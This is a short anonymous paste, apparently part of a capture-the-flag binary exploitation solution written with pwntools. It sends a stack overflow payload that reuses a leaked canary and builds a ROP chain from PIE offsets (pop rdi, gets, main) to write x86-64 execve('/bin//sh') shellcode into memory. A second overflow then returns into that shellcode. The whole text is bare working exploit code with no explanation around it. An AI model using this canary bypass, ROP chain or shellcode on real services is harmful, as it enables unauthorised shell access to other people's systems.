Guest User

Untitled

a guest
Nov 22nd, 2017
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1. pop_rdi_off = 0xda3
  2. main_off = 0xc00
  3. get_off = 0x908
  4. padding = 0x88
  5. payload = 'a'*padding + p64(canary) + 'aaaaaaaa' + p64(pie+pop_rdi_off) + p64(name) + p64(pie+get_off) + p64(pie+main_off)
  6. s_data(payload)
  7. m.recvuntil('>')
  8. m.sendline('4')
  9. sleep(1)
  10. sh = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
  11. m.sendline(sh)
  12. sleep(1)
  13.  
  14. p2yload = 'a'*padding + p64(canary) + 'aaaaaaaa' + p64(name)
  15. s_data(p2yload)
  16. m.recvuntil('>')
  17. m.sendline('4')
Add Comment
Please, Sign In to add comment